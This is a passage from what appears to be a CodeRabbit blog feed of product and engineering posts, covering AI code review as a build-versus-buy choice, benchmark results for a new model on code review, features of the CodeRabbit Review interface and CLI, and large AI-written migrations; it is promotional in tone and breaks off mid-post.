It describes the mechanism of failure but absolves no one of responsibility. In practice, feeding this AI tool dependency means teams have to completely change how they police code. Since the addiction to instant drafting inevitably floods repositories with massive diffs, teams must learn to prioritize reviewing systemic risk over cosmetic code style. Survival requires paying ruthless attention to data access, concurrency, and security boundaries while consciously protecting deep focus time from the compulsion of constant prompting. Ultimately, the goal is to design an engineering system that channels this craving for momentum into deliberate judgment. AI tools excel at feeding that developer need for immediate progress and in turning friction into instant motion. The teams that thrive won't try to cure the addiction. Instead, they will graduate from treating it as a private productivity fix and start managing it as a core, high-volume workflow.

You can build an AI code reviewer. But you probably can’t maintain it

Yiwen Xu — Mon, 01 Jun 2026 00:00:00 GMT

A VP of Engineering at an enterprise we work with put the question plainly on a call recently: *"Can we build it ourselves? How difficult can it be to build CodeRabbit?"* A few weeks later, in a different conversation with a different enterprise, the answer arrived as an architecture diagram. CodeRabbit appeared in a single box labeled "Compliance Layer and the Guardrails," sitting above the coding agents and engineers that ship code. Not an AI reviewer or code review tool but the compliance layer.

That bar is what enterprise buyers are actually buying. It's the part homegrown AI reviewers fail to deliver. The hard part isn't the first demo. It's holding a consistent, unified quality bar across hundreds of engineers, dozens of teams, and an AI tooling landscape that shifts constantly, and then making sure the standard actually gets enforced. Those, among others, are the real problems CodeRabbit was built to solve.

## What consistency actually means

Code in a modern engineering org comes from more places than it used to, with more agents, more teams, and more generations of the tech stack. Consistency in review is how the standard survives the variety. That consistency has to hold across three moving targets: where the code lands, who (or what) wrote it, and what your team adopts next.

A homegrown AI code reviewer usually starts with one repo, one workflow, and one team member’s preference. That can work for a pilot, but it breaks when the standard has to follow every team, every tool, and every code path. CodeRabbit acts as the independent verification layer that holds the same quality bar across all three:

**Same review, wherever the code lands:** GitHub, GitLab, Azure DevOps, Bitbucket, plus CLI and IDE for inline feedback. The AI reviewer is the same on every surface where your team ships.

**Same review, whoever wrote the code:** Junior developer, senior engineer, Cursor, Copilot, Claude Code, Codex.
Every PR gets reviewed against the same bar, with the same depth of context. **Same review, whatever your team adopts next:** As your team adopts new coding agents and AI tools, the reviewer moves with you. Your standards stay intact, without forcing you to rebuild the review system every time the stack changes. ## What makes a high-quality review trustworthy? Now your AI reviewer covers every surface, every author, every coding agent your team uses. The next question is whether what it says is worth reading and actionable. The review has to earn trust: feedback grounded in your codebase, your team's rules, and what your team has already learned. CodeRabbit grounds every review in all three, and gets better with use. **Reviews grounded in your context:** CodeRabbit’s context engine leverages code graph, multi-repo dependencies, prior PR discussions, ticketing systems, docs, systems via MCP, and knowledge base. We have been building this for over three years across 15,000+ teams and 2M PRs reviewed per week. **Reviews tuned to your standards:** You set the path instructions, configurations, custom checks and code guidelines that matter to your team. Every review respects them. The comments are specific to your codebase, not like generic rules your team has learned to tune out. **Reviews improved by every learning:** When one engineer teaches the AI reviewer a standard, a naming convention, a security rule, or a path-specific instruction, the rest of the team benefits. The reviewer gets sharper with use, and that learning compounds across the organization. Many teams assume they need to build their own review system to fit their workflow, incorporate their context, and make reviews relevant to their codebase. But that is a misconception. CodeRabbit is built to adapt to how teams work and is highly customizable. 
Teams can connect their ticketing systems, bring in additional data and internal systems through MCP, and use custom instructions and configurations to make reviews reflect their standards and preferences. Unlike a DIY system, CodeRabbit can scale and evolve as teams grow, workflows change, and the tooling landscape shifts, without requiring teams to rebuild and maintain the review infrastructure themselves. The result is code review that is high-quality, explainable, and easy to act on. That is why one enterprise customer described CodeRabbit as both a “safety net for code” and a “24/7 mentor” that helps developers catch issues while also understanding the engineering practices behind them. ## Turning quality standards into compliance gates Consistency and quality are the floor. Compliance is what makes the floor enforceable. An AI reviewer that finds the right issue but lets the PR merge anyway isn't a quality gate. That is why the enterprise customer we mentioned earlier did not label CodeRabbit “an AI reviewer” in their architecture diagram. They labeled it the “Compliance Layer.” Under that label were three jobs: a safety net for the code, automated governance for the standards, and a coaching loop for developers. CodeRabbit offers products that make the standard easy to define, enforce, and improve over time. **Pre-Merge Checks, the automated governance.** Codify your team's Golden Paths standards (for example, *"always use the Finance API for currency conversion"*) into automated quality gates that evaluate every pull request and fail until critical issues are resolved. Built-in checks cover the basics every team expects, including docstring coverage, PR titles, descriptions, and linked-issue alignment. Custom checks enforce the rules linters miss, such as sensitive data in logs, hardcoded credentials, breaking-change documentation, and migration safeguards. 
In the CodeRabbit dashboard, you can see which checks are running, where they’re passing or failing, and what needs to be improved to keep standards enforced. **Finishing Touches, turning fixes into enforceable remediation.** Finishing Touches turns repeated fixes into repeatable remediation workflows. CodeRabbit can generate missing docstrings, write unit tests, resolve merge conflicts, and run team-specific cleanup recipes for import ordering, type tightening, and project conventions. The goal is more than just catching issues. It’s to help developers get them fixed before they merge while keeping the team’s standards intact. **Global Overrides, the org-wide policy lever.** Compliance breaks down when every team manages its own version of the rules. One team updates .coderabbit.yaml, another tweaks it, a third leaves it untouched, and suddenly the “standard” means something different in every repo. Global Overrides let org admins set the configuration once, including required path instructions for sensitive code, mandatory review profiles, and security rules. CodeRabbit applies them on the next PR across every repository, regardless of what individual repos have in their config. Together, these features turn a consistent AI reviewer into a closed-loop compliance system. Set the policy, monitor adoption, and enforce it across every team, with a dashboard that gives you visibility and insights for improvement. ## The question to ask before you build If your team is weighing build vs. buy, ask yourselves the following questions: **On consistency:** * Is every PR reviewed against the same bar, whether a junior developer wrote it or an AI agent did? * Will the reviewer travel with your team when you adopt the next coding agent or platform? **On quality:** * Are the comments grounded in your codebase and configuration, or boilerplate your engineers learned to ignore? * Does the reviewer get sharper and more useful with use? 
**On compliance:** * Are policies enforced before merge, not just flagged after? * When one team rewrites their config or quietly drops a check, does the org-wide standard still apply? That’s the bar. CodeRabbit is built to hold it across every repo, team, and coding agent. A DIY reviewer may catch issues in a narrow workflow, but it usually stops there. Most importantly, a DIY reviewer does not become the system of record for how engineering standards are verified, enforced, and improved over time. That is the real build-vs-buy question. Do you want your engineering team maintaining review infrastructure, or building the products only they can build? **See it for yourself.** [Try CodeRabbit for free](https://app.coderabbit.ai/login?free-trial) on your repos.

Opus 4.8 benchmark results for AI code review and code generation

Juan Pablo Flores — Thu, 28 May 2026 00:00:00 GMT

Anthropic just shipped Opus 4.8. Before its release, we spent some time putting it through its paces, most of it on code review tasks. We ran it against our standard evaluation harness, watched how it behaves on real pull requests, and probed where it holds up and where it strains. Alongside that, we used it for the kind of long-running coding work that tends to break agents before they finish. On review, it lands at parity with our tuned production ensemble. The surprise was how much it pulled ahead on code generation and long-horizon agentic sessions. ## **What’s new in Opus 4.8** Three things actually shipped, and everything else is downstream: - **Long-horizon agentic execution.** It performed well on tasks that span many tool calls without losing the thread. It plans before acting and holds the goal across hours-long sessions. Give it the full spec up front at high effort. Drip-feeding requirements performs noticeably worse. It completed more multi-hour, many-file sessions without dropping the thread than any model we've evaluated, and the same intermediate reasoning shows up in stronger code generation. - **Mid-session system prompts.** The messages array now accepts `{"role": "system", ...}` entries mid-conversation without invalidating prompt caches. The model follows them most reliably when they are framed as context rather than as overrides. It also narrates its plan, second-guesses itself, and requests permission more often than prior Opus versions. These are all useful behaviors, but they require active budgeting and steering. - **Tool-use recalibration.** Web search triggers more often, but runs fewer rounds. Retrieval tools, sub-agents, and memory files trigger less often, with the model defaulting to answering from context. The net effect is high-precision, low-recall behavior, steerable with an explicit instruction. 
On code review, it lands at parity, with an actionable pass rate of 61% vs 62% for our baseline and a full-system pass rate of 72% vs 68%, at unchanged precision. 
But the comment mix shifts and critical findings dipped (35 to 29), which gives us pause. In our “Results” section below, we dig into why, and whether it is recoverable. CodeRabbit is integrating it selectively where its strengths fit, and routing to other models where they win on cost without sacrificing quality or pass rate. %[https://youtu.be/LzgPzQud0zA] ## **What we tested** We ran Opus 4.8 through the same harness we use for every model release: 100 open-source pull requests sampled across trivial, minor, and major complexity tiers. We compared two thinking configurations (a default escalating medium/high/x-high by tier, and a lower-thinking variant running low/medium/high) against a baseline running our current production model mix on the same PRs. Two metrics drive the analysis: pass rate (the fraction of PRs on which the model surfaced the equivalent of what a senior human reviewer would flag) and precision (the fraction of comments that were actionable rather than noise). "Actionable" is adjudicated by senior reviewers. ## **Results** The default Opus 4.8 config edges past our baseline on full-system pass rate (+4pp, 72% vs 68%) and sits within noise on actionable pass rate (61% vs 62%). Precision holds at 33.8% on actionable comments and ticks up a point on the full system. For a model going head to head with a tuned ensemble on a surface it was not specifically optimized for, that is a strong result, and the cross-file reasoning is clearest on senior-tier PRs. ![Severity distribution bar chart compares Baseline, Opus 4.8 default, and Opus 4.8 One Thinking models.](https://victorious-bubble-f69a016683.media.strapiapp.com/Opus_4_8_image1_c33fb05d6c.png) ![Data table displaying findings by severity for Baseline and Opus 4.8 models.](https://victorious-bubble-f69a016683.media.strapiapp.com/Opus_4_8_image2_5dbc493cf0.png) The comment mix is noisier than baseline, however. Major findings drop from 119 to 81, while minor and nitpick findings both roughly double. 
The model is shifting volume from the middle of the severity range toward the bottom. The one result that gives us pause is critical findings, which fell from 35 to 29. For a code-review tool, missed criticals matter more than any other category of finding. Our working explanation is that Opus 4.8 follows review instructions literally. Consequently, conservative prompts ("only report high-severity issues") suppress recall more than they did with prior models. We believe the higher-severity bug-finding capacity is real once the model is allowed to report broadly and we filter downstream rather than constraining at the source. The lower-thinking variant tells a useful secondary story. Cutting reasoning effort drops precision four points and actionable pass rate five points. Thinking level is a first-class configuration decision. We also found the default config costs more. We measured $0.20 to $0.28 per call against roughly $0.13 for [Opus 4.5](https://www.coderabbit.ai/blog/opus-45-for-code-related-tasks-performs-like-the-systems-architect) and $0.04 to $0.12 for [Sonnet 4.5](https://www.coderabbit.ai/blog/claude-sonnet-45-better-performance-but-a-paradox). On code review alone, the model is at parity, making the premium hard to justify for review-only use. It earns its value on long-horizon agentic and code-generation work. That cost-versus-surface tradeoff is exactly why we route it selectively rather than everywhere. ## **Where it struggled** Performance degrades visibly once context crosses 200k tokens. The model slows and starts to miss references and edge cases it would have caught cleanly at smaller context sizes. This is an observational finding from hands-on use, not a controlled measurement. CodeRabbit's context engine works around this, but teams using Opus 4.8 directly will hit a wall in monorepos and large codebases. ## **What this means for CodeRabbit users** We are integrating Opus 4.8 selectively. 
Its strengths (cross-file reasoning, long-horizon agentic quality, planning under a single up-front spec) show up most on senior-tier changes. So that is where you will see it engaged. For trivial and junior-tier PRs, we continue routing to the models that win on cost and pass rate at those tiers. For our agentic features, we expect Opus 4.8 to be the strongest backbone we have integrated. If you run Opus 4.8 directly, most existing Opus prompts work without modification. A few tune-ups produced measurable differences in our testing. Start at "high" thinking rather than "x-high" and test across tiers. Front-load the full task context for long-horizon work. Add an explicit search-first or delegation instruction to recover depth on research-heavy work. Drop conservative language from review prompts and filter downstream instead. Name the small decisions the model can make on its own. We will keep evaluating as the model and our harness change. If the picture shifts, we will publish updated numbers.
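For readers who want to reproduce this kind of comparison on their own PRs, the two metrics defined under "What we tested" can be sketched roughly as follows. This is a minimal illustration, not CodeRabbit's evaluation harness: the `ReviewResult` record, its field names, and the sample data are all hypothetical.

```python
from dataclasses import dataclass


@dataclass
class ReviewResult:
    """One PR's outcome in a hypothetical evaluation run."""
    pr_id: str
    surfaced_expected_issue: bool  # did the model flag what a senior reviewer would?
    total_comments: int            # every comment the model left on the PR
    actionable_comments: int       # comments a human adjudicator marked actionable


def pass_rate(results):
    """Fraction of PRs on which the expected issue was surfaced."""
    if not results:
        return 0.0
    return sum(r.surfaced_expected_issue for r in results) / len(results)


def precision(results):
    """Fraction of all comments that were actionable rather than noise."""
    total = sum(r.total_comments for r in results)
    if total == 0:
        return 0.0
    return sum(r.actionable_comments for r in results) / total


# Made-up sample data, for illustration only.
results = [
    ReviewResult("pr-1", True, 4, 2),
    ReviewResult("pr-2", False, 3, 0),
    ReviewResult("pr-3", True, 5, 2),
    ReviewResult("pr-4", True, 2, 1),
]

print(f"pass rate: {pass_rate(results):.2f}")
print(f"precision: {precision(results):.2f}")
```

Note that the two metrics use different denominators: pass rate is counted per PR, precision per comment. That is why a model can hold precision steady while its severity mix shifts.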

What's new in CodeRabbit Review: Code Peek, Chat Agent and more

Konrad Sopala — Wed, 27 May 2026 00:00:00 GMT

CodeRabbit Review went live earlier this month. It’s a new review interface that takes a pull request and reorganizes it from a flat file list into ordered cohorts and layers, so you can read the change in the order it was actually built. In the two weeks since its release, a handful of features have landed on top of it. Here's a look at what's new: %[https://youtu.be/FYOYBqIva1Q] ## Cohorts: Independent slices of work in the same PR A modern pull request is rarely one thing, especially when an AI agent wrote it. A single PR can now touch a new data model, the backend that consumes it, an unrelated bug fix, and a config change - all in the same diff. Reading top to bottom means context-switching between unrelated topics every few files. **Change Stack** groups the diff into **cohorts**: small, independent units of related work. Each cohort is its own mini walkthrough, with its own ordered layers, range-specific summaries, and diagrams where they earn a place. You can finish one cohort and pick up the next without having to hold the whole PR in your head at once. For a handwritten 80-line change, this feature may not matter much. But for a 1,400-line AI-authored PR that touches three unrelated concerns, it's the difference between "I'll review this tomorrow" and actually reviewing it now. ## Code Peek: Look up anything without leaving the review ![Code editor shows a diff view of a Kotlin configuration file with highlighted code changes.](https://victorious-bubble-f69a016683.media.strapiapp.com/Code_Peek_602a3cf6b6.png) You're reading a diff, you hit a function call, and an obvious question comes up: where is this defined, and what else calls it? The honest answer for most reviewers is, "I'll open it in another tab and grep around." This usually means a few minutes of orientation, then forgetting where you were in the review. [Code Peek](https://docs.coderabbit.ai/pr-reviews/change-stack#code-peek) removes that detour. 
Click any variable, function, class, or type name in the diff, and Change Stack looks up its likely definition and usages inline, using GitHub code search and showing the surrounding context, so you can follow the code without leaving the page. When a result points to a file that's actually changed in the PR, an **Open in Change Stack** action jumps you directly to that file. CodeRabbit Review also keeps an in-page back trail, so you can chase a symbol three files deep and still get back to where you started. It's the kind of small thing that makes a long review feel less like an archaeological dig. ## Chat Agent: Ask the PR questions ![Chat conversation in dark mode about app architecture changes related to a pull request.](https://victorious-bubble-f69a016683.media.strapiapp.com/Chat_Agent_098f7bf552.png) Walkthroughs and range summaries answer the questions most reviewers often ask. But sometimes you may have a specific inquiry or request that isn’t covered: - What exactly changed in NotificationDispatcher.kt? - Which layers depend on the dispatcher changes? - Walk me through this storage adapter rename. The **Chat Agent** tab in Change Stack allows you to make those inquiries right where you are working. It has the full context of the PR - every cohort, layer, changed line - and answers in the same view you're already working in. You're not flipping over to a separate chat window to ask the AI to summarize the PR because the AI is already sitting on the same diff you’re in. It's most useful for the kind of question you'd otherwise ask a teammate who wrote the PR. Except no one has to be online for you to ask it. ## Severity Labels: Triage by importance level ![A dark UI shows a 'Notification Event Dispatch System' with description for its 'Notification Events'.](https://victorious-bubble-f69a016683.media.strapiapp.com/Severity_Label_2756b1bf77.png) A long PR begets a long list of CodeRabbit findings, and not every finding is the same. 
Some are blocking, some are improvements, some are nits. Change Stack now surfaces four severity buckets that you can filter and group by: - Critical - Major - Minor - Trivial These are separate from two other label families CodeRabbit already attaches to comments. **Comment type** tells you what kind of feedback it is: potential issue, refactor suggestion, or nitpick. **Effort** tells you what the fix is worth: quick win, heavy lift, poor tradeoff, or low value. Stack the filters together and you can do things like "show me only critical or major potential issues", which is useful when you're deciding whether a PR is shippable in the next hour or genuinely needs a second pass. ## Try them out If you've been opening large AI-generated PRs and bouncing between files trying to reconstruct what depends on what, Cohorts and Code Peek should take a chunk of that work off your plate. If you've ever wanted to ask a PR a question instead of re-reading the whole thing to find the answer, now you can with the Chat Agent. And if your CodeRabbit findings list has been getting long, the severity filters should help you cut through it faster. Change Stack is in early access and currently only available on GitHub. It's available to all users during the launch window and will be part of the Pro+ plan going forward. Click the **Review Change Stack** button in your next CodeRabbit PR comment to try it. [Get started with CodeRabbit](https://app.coderabbit.ai/login?free-trial)

CodeRabbit is now in the Claude Marketplace

Wed, 27 May 2026 00:00:00 GMT

**Starting today, Anthropic customers can apply their existing Anthropic spend commitment toward CodeRabbit.** Simplified procurement. Consolidated AI spend. A single Anthropic invoice for both. Claude is rewriting how software gets built, and it's faster than anyone thought possible. The question now isn’t: _How fast can we write code?_ Instead it’s: _How much do we trust what’s shipping?_ CodeRabbit is the independent quality gate for the agentic SDLC. Agent-agnostic by design, it catches real bugs, explains what's changed and why, and enforces the standards each team actually cares about. More than 15,000 teams trust CodeRabbit to ship agentic code with confidence. >CodeRabbit is the only review tool I trust when running fully autonomous coding loops. * Abhi Aiyer, CTO, Mastra #### Get CodeRabbit through the Claude Marketplace **For Enterprises:** [Contact CodeRabbit](https://www.coderabbit.ai/contact-us) or your Anthropic account team to add CodeRabbit through your [Claude Marketplace](https://claude.com/platform/marketplace) agreement. **For Developers:** [Install CodeRabbit free](https://coderabbit.link/88vkRqF) on any GitHub, GitLab, Bitbucket, or Azure DevOps repo. **Claude writes the code. CodeRabbit makes sure it’s right. The engine of trust for your agentic SDLC.**

AI can migrate your entire codebase. Reviewing it is another story

Santosh Yadav — Tue, 26 May 2026 00:00:00 GMT

Three years ago, I was migrating code that generated a very large diff. My principal engineer was concerned and asked, “Could we break this PR down into smaller PRs so it would be easier to review?” I explained that it was a migration PR, which is why it was much larger than any other PR I’d otherwise submit. ![Values +679 (green) and -34,644 (red) with a five-segment red progress bar.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_f1f4906f7f.png) Migration PRs are common, and companies take them on for many reasons, whether it’s moving from React to Angular or modernizing an aging stack. Before AI, though, these efforts were incredibly time-intensive and typically resulted in massive diffs that were difficult to review. Beyond the migration work itself, one of the biggest challenges organizations face is figuring out how to review these PRs effectively. My own migration experience happened before today’s wave of agentic coding tools and advanced models. Back then, generating the migration was the hard part. Today, AI has dramatically lowered that barrier, and the bottleneck is shifting toward something else entirely: reviewing the large, complex diffs that migrations inevitably produce. ## Did Bun being rewritten in Rust change migrations? One of the biggest recent examples of a migration was Bun being rewritten from Zig to Rust. It involved over 1 million lines of code being modified across roughly 2,000 files, over a few days. Yes, you read that right, a few days. ![GitHub pull request for rewriting Bun in Rust, highlighting project details and benefits discussed.](https://victorious-bubble-f69a016683.media.strapiapp.com/image3_6c5ceca84c.jpg) In the case of Bun, the project started small and picked a language that was easy to understand and scale. More recently, the project became difficult to scale and ran into memory leak issues, which were among the many reasons Bun migrated from Zig to Rust. 
Thousands of people were surprised, and some were even angry, because the migration itself was written by AI. I understand the frustration of users, but it opened up a discussion: migrations at this scale will be more common in the future. ## PR review views were created with the idea that PRs should be small AI coding agents can program in any language, which changes the whole conversation around migrations. Before, teams picked a language or framework based on what they were comfortable writing code in, and even hired people specifically for the tools they used or planned to use. Slowly, syntax is becoming irrelevant, and the principles and basics of programming as a whole are more important than ever before. Uncle Bob Martin, famous for his book Clean Code, recently wrote on X (formerly Twitter): ![Uncle Bob Martin's tweet emphasizes Clean Code is about structure, not syntax, applying universally.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_0ce12b503b.jpg) [https://x.com/unclebobmartin/status/2055016815047164304](https://x.com/unclebobmartin/status/2055016815047164304) While AI agents are language agnostic for programming, the review process of PRs is still a challenge for organizations and OSS projects, as it’s hard to understand what changed, especially in a language you are not familiar with. Sure, syntax still matters to an extent, but understanding what is being shipped and discussing it during the PR review is still where most developers struggle, and as PRs are only getting larger, this problem is compounding over time. For years, the PR review view was meant for PRs that are small, so developers could understand what changed during the review process. ## It’s time for a change As a developer, it’s hard to imagine a world before GitHub launched. 
I still remember sending patches over email to my colleagues, and when GitHub launched and allowed us to see the diff in the browser, it changed how we shipped code, not only as individuals but as teams. We all know that with AI writing most of the code nowadays, the size of PRs is only increasing. Despite this new reality, the diff is still the default review interface, as it has been for nearly two decades. Take the Bun PR everyone is talking about; the PR has more than 1,300 discussions, and all of them are hidden. None of the useful discussions in the thread are visible until you expand them. ![Dark-themed code review screenshot displaying feature upgrade, optimization notes, and a user's critical comment.](https://victorious-bubble-f69a016683.media.strapiapp.com/image4_8ea73abe28.jpg) Sure, a rewrite of this size is impressive and opens the door to what AI can accomplish in migrations, but the harder problem to solve is getting reviewers to understand migrated code at scale, in any programming language. We need a view with details that can explain the intent behind those changes. We are solving this issue at CodeRabbit and I couldn’t be more excited about it. ## What we built: CodeRabbit Review Be honest with yourself for a second. How often do you read the code when doing a PR review? It’s fairly common for reviewers to not have the bandwidth to read through large PRs line-by-line and understand what has changed. I have been writing and reviewing code for close to two decades now and when I review code I look for intent and ensure the code solves the correct problem. Most of us do the same; we check why the PR is open and what problem it's trying to solve. In some cases, you have more context about how the changes can affect the codebase, so you look at the CI/CD pipeline and approve or leave a comment. So, if you think about the PR review process, the two most important things are intent and context. 
At CodeRabbit, we ship improvements to our context engineering approach daily and have SMEs fully dedicated to this process. With CodeRabbit Review, we are providing developers with everything they need to review a PR with the intent and context behind the changes. ![Dark themed code editor showing source code and a comments pane with review discussions.](https://victorious-bubble-f69a016683.media.strapiapp.com/image5_0e202ff207.jpg) The context and intent regarding the code changes stay where the code is, avoiding the back and forth that comes with context switching when reviewing code. CodeRabbit Review knows which changes should be reviewed together and stacks them, which makes it easier for anyone looking at the PR to understand the changes with better context. ![A list of programming topics including Rust build, migration automation, and core primitives.](https://victorious-bubble-f69a016683.media.strapiapp.com/image6_8fc19b0206.jpg) It’s quite common for PR comments to get lost in the discussion. CodeRabbit Review helps in these situations by putting the comments right next to your files, so they are easy to find and the review moves faster. ## Code review in OSS The open-source world is moving faster thanks to AI, and OSS maintainers can ship bug fixes and validate changes faster than ever. However, in conversations we’ve had with users, we keep hearing that discussing large PRs with contributors is still an issue. CodeRabbit Review can handle this use case and help maintainers understand changes in larger PRs in less time. Try CodeRabbit Review on the next large PR in your queue. CodeRabbit Review is free for a limited time for every CodeRabbit user. You can find it by clicking Review Change Stack in the CodeRabbit PR summary comment.

CodeRabbit CLI 0.5.0: Easier setup, clearer org selection, and a new health check

Juan Pablo Flores — Thu, 21 May 2026 00:00:00 GMT

We are releasing [CodeRabbit CLI 0.5.0](https://docs.coderabbit.ai/cli/index), an update focused on making the CLI easier to start, easier to manage, and easier to fix when your local setup blocks a review. For example, if the CLI cannot authenticate, cannot reach CodeRabbit, cannot tell which organization should be used, or cannot read the repo state it needs, you now have clearer next steps. The CLI is often the fastest way to bring CodeRabbit into your local workflow. You install it, run a review from your terminal, and keep moving without leaving the code you are already working on. But the small setup moments around that flow matter. If login is missed during install, if a command needs authentication, if the wrong organization gets selected, or if a local setup issue is hard to diagnose, the experience slows down. CodeRabbit CLI 0.5.0 is designed to smooth out those moments. # Login happens when you need it Getting started with the CLI should feel direct. Now, when you run a command that requires you to log in, CodeRabbit takes you straight into the login flow. You do not need to stop, look up the right command, or figure out why the CLI cannot continue. %[https://youtu.be/4sP4ZMjlyy8] We also improved the install flow so logging in is part of the setup path. That means fewer cases where the CLI is installed, but not ready to use. Install it, log in, and start running reviews. # Check your setup with `coderabbit doctor` Sometimes the CLI needs a quick health check. That is what `coderabbit doctor` is for. Run:

```bash
coderabbit doctor
```

%[https://youtu.be/OHxE5bVM0f4] It checks the parts of your local setup that matter most, including auth, network access, git state, and configuration. If something is off, you have a better place to start than guessing. It’s a simple command for answering: "Is my CLI setup healthy?" 
# Choose the right organization If you work across multiple organizations, CodeRabbit now gives you a clearer way to choose where CLI usage belongs. Instead of quietly defaulting to the first organization in your list, the CLI lets you select the right org. That helps make sure usage and billing go to the place you expect. %[https://youtu.be/8wkAD0DZZro] We also improved how CodeRabbit maps the current repo to the correct organization, so the CLI can better understand where it is being used. # Clearer upgrade paths when you hit limits If you are on the free plan and hit a rate limit, the CLI now gives you a clearer next step. Instead of leaving you stuck, CodeRabbit points you toward Pro Plus so you can keep going when you need more usage. This release is about making the CLI feel more ready when you need it. Less setup confusion, clearer account choices, and better tools when something needs a look.

The diff says 1,400 lines. The change is six

Konrad Sopala — Thu, 21 May 2026 00:00:00 GMT

You open the PR, and find it's an AI-authored change, and the diff shows 1,400 lines of code changed. Every moved line shows up as a delete on the left and an identical add on the right. The one line that actually changed is buried somewhere in the middle of all that, indistinguishable from the noise around it. So you do what you always do, and scroll through the changes and mentally subtract the moves until you find the substance. During your review process you are not reviewing what changed, but actually reverse-engineering it and then reviewing whatever’s left of your attention. That's what semantic diff view fixes. ## Meet the semantic diff view in CodeRabbit Review CodeRabbit Review now has a third way to look at a diff. Alongside Unified and Split views, there's a Semantic view that groups related code movement and token-level changes together, so large pull requests are actually inspectable (including AI-authored ones). ![A dark themed code editor displays a diff view with removed and added code lines.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_9b25979c63.png) The premise is the same one CodeRabbit Review was built on. AI-assisted development made PRs bigger and more frequent. A single change now routinely touches dozens of files across multiple layers. A flat, line-by-line diff was already a rough way to read that. When most of the diff is mechanical movement, it's worse than rough: it's actively hiding the change inside its own bookkeeping. Semantic mode reads the diff the way you would if you had the time to do it by hand. A block that moved is shown as a block that moved, not as a paired deletion and insertion you have to recognize and discount yourself. A token-level edit inside an otherwise-unchanged line is surfaced as the edit, not the whole line lighting up. What's left, once the noise is grouped and labeled, is the part you opened the PR to evaluate. 
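To make the idea of separating movement from substance concrete, here is a rough sketch that splits a line diff into "moved" lines and genuinely removed or added lines. It is an illustration only and says nothing about how CodeRabbit's Semantic view is implemented: it uses Python's standard `difflib`, works at line level rather than token level, and the `classify_changes` helper is a hypothetical name.

```python
import difflib
from collections import Counter


def classify_changes(old_lines, new_lines):
    """Split a line diff into moved lines and real removals/additions.

    Assumption for this sketch: a line whose exact text is both deleted
    and inserted somewhere in the diff is treated as "moved".
    """
    removed, added = [], []
    matcher = difflib.SequenceMatcher(a=old_lines, b=new_lines, autojunk=False)
    for tag, i1, i2, j1, j2 in matcher.get_opcodes():
        if tag in ("delete", "replace"):
            removed.extend(old_lines[i1:i2])
        if tag in ("insert", "replace"):
            added.extend(new_lines[j1:j2])

    # Multiset intersection: text that shows up on both sides of the diff.
    moved = Counter(removed) & Counter(added)
    return {
        "moved": sorted(moved.elements()),
        "removed": list((Counter(removed) - moved).elements()),
        "added": list((Counter(added) - moved).elements()),
    }


old = ["def a():", "    return 1", "", "def b():", "    return 2"]
new = ["def b():", "    return 3", "", "def a():", "    return 1"]

result = classify_changes(old, new)
print("moved:  ", result["moved"])
print("removed:", result["removed"])
print("added:  ", result["added"])
```

In this toy input the two functions swap places and one return value changes. A flat diff reports several deleted and inserted lines, while the classification leaves a single removed line and a single added line as the part worth reading. A real tool would also need to track block boundaries and edits inside a line, which this sketch ignores.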
%[https://youtu.be/pYWOBPhVdRU] It slots into everything CodeRabbit Review already does. You're still inside ordered cohorts and layers, anchored to specific line ranges, reading the range summary in the right panel and dropping inline comments that post back to GitHub natively. Semantic is just the lens you put over the diff once you're there. Toggle it from the diff header like you would unified or split. ## What else shipped alongside it [A few other updates](https://docs.coderabbit.ai/changelog#change-stack-diff-views) in CodeRabbit Review worth knowing about: * **All files view:** The left rail now has an All files entry for searching and jumping across every file in CodeRabbit's review scope, not just navigating cohort by cohort. When you already know the file you want, you go straight to it. * **Comment autocomplete:** The comment composer now does GitHub-style autocomplete: user and team mentions, issue and pull request references, metadata references, and emoji shortcodes. The comment you leave in CodeRabbit Review reads the same as one you'd type in GitHub, because it's the same syntax. * **Automatic line wrapping everywhere:** Diff lines now wrap automatically in every view, so there's no separate line-wrap toggle to find and flip. One less control between you and the code. None of these are headline features on their own. Together they remove the small frictions that add up when you're an hour into a large review. ## A quick refresher, if you missed CodeRabbit Review If this is the first you're hearing of CodeRabbit Review: it's a code review interface that reorganizes a pull request from a flat, alphabetical file list into a guided, layer-by-layer walkthrough. CodeRabbit groups related work into cohorts, orders the changes inside each one into layers so foundational changes come before the code that depends on them, writes a plain-language summary for each range, and generates a diagram inline where one actually earns its place. 
You open it from the **Review Change Stack** button in the CodeRabbit PR comment. It's an opt-in per reviewer. Teammates who want the default GitHub experience just ignore the button, and nothing about the PR changes for them. Full details are in the [documentation](https://docs.coderabbit.ai/pr-reviews/change-stack). ## Try it out The semantic diff view, the all files view, and comment autocomplete are live in CodeRabbit Review now. CodeRabbit Review is on GitHub, in early access, and available to all users currently. It'll be part of the Pro+ plan going forward. Next time an AI-authored PR lands and the diff looks like 1,400 lines of static, open it in CodeRabbit Review and switch to semantic. [Get started with CodeRabbit](https://coderabbit.link/Q5oy5FI)

The best agent in your Slack is the one nobody @mentioned

Konrad Sopala — Wed, 20 May 2026 00:00:00 GMT

Think about the most useful thing your AI agent did this week. Really, pick one specific example. Now notice something about it: there's a decent chance nobody asked for it. The best work wasn't an answer to a prompt. It was already waiting in the thread before anyone showed up. That's not a quirk. That's the whole point, and most of the industry has the mental model pointed backwards. ## The chat box ate everyone's brain ChatGPT taught a hundred million people what AI is by putting it behind a text box: you type, it answers. The turn starts with you. That interface was so successful that it became the default model, and now nearly every "AI assistant" inherits the same buried assumption: a human has to open every turn. It's such a natural assumption that it's nearly invisible, which is exactly why it's worth saying out loud. If a person has to start every turn, then the agent's usefulness is capped by that person's attention. It can only ever help with problems someone already noticed, already framed well enough to type, and already had the time and presence of mind to ask about. Look at what that ceiling excludes: the latency spike at 2:38 a.m., the dependency advisory that landed while the team was asleep, the incident that started before anyone was watching the right channel. The most valuable problems an agent could touch are precisely the ones that arrive when nobody is awake or available to @mention. Bolt the agent to the prompt, and you've guaranteed it can't help with any of them. ## Invert the turn So invert it, and let the work start before the human. Datadog notices p99 latency climbing. A trigger fires: no message, no mention, nobody typing. The agent pulls the traces, walks the recent deployments, finds the PR that shipped a scaling config change disguised as an env var update, and posts that into the channel where the on-call engineer is about to be paged. Then a human arrives. Their first action isn't "let me ask the agent to look into this."
